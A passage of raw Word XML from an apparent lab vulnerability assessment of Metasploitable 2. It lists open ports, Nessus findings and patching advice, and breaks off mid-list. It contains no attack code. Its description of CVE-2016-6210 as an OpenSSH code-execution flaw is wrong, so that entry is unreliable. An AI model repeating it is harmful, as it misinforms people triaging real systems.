    <w:p w:rsidR="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 1524: ingreslock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00CE2F63" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Potential vulnerabilities were identified based on the open ports and services running. For example, having Telnet (port 23) and FTP (port 21) services exposed could indicate security risks due to their inherent lack of encryption and weak authentication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="006F2646" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4. Nessus Vulnerability Assessment Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2F63">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The Nessus scan identified multiple vulnerabilities, including critical and high-risk issues. Notable vulnerabilities include outdated software versions, weak authentication mechanisms, and known exploits associated with certain services. These vulnerabilities could lead to unauthorized access, data breaches, and potential system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The Nessus vulnerability assessment on Metasploitable 2 identified several vulnerabilities with varying severity levels. Some of the key findings are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a) Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability: Apache Tomcat RCE (Remote Code Execution) - CVE-2009-3548</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Recommendation: Patch the vulnerable version of Apache Tomcat or upgrade to a newer, secure version immediately to prevent potential remote code execution attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b) Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability: OpenSSH Key Exchange Algorithm String Identification Code Execution - CVE-2016-6210</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation: Update OpenSSH to the latest version, which addresses this vulnerability, or disable SSH if not required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c) Severity: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability: Anonymous FTP Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00CE2F63" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Recommendation: Disable anonymous FTP access to prevent unauthorized access and potential data breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="006F2646" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5. Recommended Remediation Actions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2F63">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To mitigate the identified vulnerabilities, the following remediation actions are recommended: updating software to the latest patched versions, implementing strong authentication mechanisms, disabling unnecessary services, and applying necessary security configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRDefault="00F85955" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To improve the security posture of Metasploitable 2, the following remediation actions are recommended for the identified vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a) Apache Tomcat RCE (Remote Code Execution) - CVE-2009-3548:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Upgrade Apache Tomcat to the latest version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apply security patches for the vulnerable version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implement strict access controls and regularly review server configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b) OpenSSH Key Exchange Algorithm String Identification Code Execution - CVE-2016-6210:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Update OpenSSH to the latest version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Disable SSH if not required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implement strong authentication mechanisms, such as public key authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c) Anonymous FTP Enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Disable anonymous FTP access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00CE2F63" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implement proper access controls and user authentication for FTP services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="006F2646" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6. Conclusion and Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2F63">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusion, the vulnerability assessment highlighted significant risks in the Metasploitable 2 system. To improve its security posture, it is recommended to regularly update software, enforce strong authentication, and follow security best practices. Conducting periodic vulnerability assessments and implementing a robust patch management process are crucial for maintaining a secure environment. Continuous monitoring, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE2F63">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>network segmentation, and user awareness training should also be considered to enhance overall security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRDefault="009305D1" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009305D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Focus on high and critical severity vulnerabilities first, as they pose the most significant risks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRDefault="00F85955" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To improve the security posture of Metasploitable 2, the following recommendations are provided</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Regularly update and patch all software running on the system, including the operating system, web server, and other services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85955" w:rsidRPr="00F85955" w:rsidRDefault="00F85955" w:rsidP="00F85955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85955">
        <w:rPr>
